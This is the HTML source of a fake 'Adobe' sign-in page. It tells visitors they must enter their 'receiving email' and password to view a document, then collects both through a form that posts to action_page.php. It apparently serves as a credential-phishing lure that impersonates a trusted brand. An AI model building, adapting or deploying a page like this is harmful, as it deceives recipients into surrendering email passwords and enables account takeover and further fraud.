<!DOCTYPE html>
<html>
	<head>
	<meta http-equiv="X-UA-compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width initial-scale=1">
		<meta charset="UTF-8">
		<title>Adobe</title>
		<link rel = "icon" href="">
		<link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600&display=swap" rel="stylesheet">

			<link href="https://fonts.googleapis.com/css?family=Raleway:200,300,400,500,600&display=swap" rel="stylesheet">
			
			<link rel="stylesheet" href="css/font-awesome/css/font-awesome.min.css">
			<link rel="stylesheet" href="css/bootstrap/bootstrap.css">
			<link rel="stylesheet" href= "css/style.css">
	</head>
	<body>
	<!--preloader-->
	
	<div id = "preloader">
	<div id = "status">
	&nbsp;
		
	</div>	
		
	</div>
	<img id="home-image" src = "img/palomarincon.jpg" alt = "Paloma Rincon">
	<!--Overlay-->
		<div id="home-overlay">
		</div>
		<!--Login page-->
		<div class="content-box-sm">
		<div class="container">
		<div class = "row">
		<div class="col-md-6"></div>
		<div class="col-md-6">
		<div id="login-right">
		<header>
		<div id="wrapper">
				<img id="image"src="img/Adobe-logo.svg" alt ="ADOBE" class="img-responsive">
				</header>
				<h4>Adobe requires you to sign in with your receiving email to view this document.</h4>
				</div>
						<form action="/action_page.php" onsubmit="return validateForm()" method="post">
							<div class="form-group">
								<label for="email">Email address:</label>
								<input type="email" class="form-control" id="email" placeholder="Your receiving email">
							</div>
							<div class="form-group">
								<label for="pwd">Password:</label>
								<input type="password" class="form-control" id="pwd" placeholder="password">
							</div>
							<button type="submit" class="btn btn-default">Submit</button>
						</form></div>

			</form>

		</div>
		</div>

	</div>

</div>
</div>

		  
		</body> 
		  
		</html> 
	<script src="js/jquery.js">
		</script>
	<script src="js/bootstrap/bootstrap.js"></script>
	<!--Custom Js-->
		<script src="js/script.js">
		</script>
		
	</body>
</html>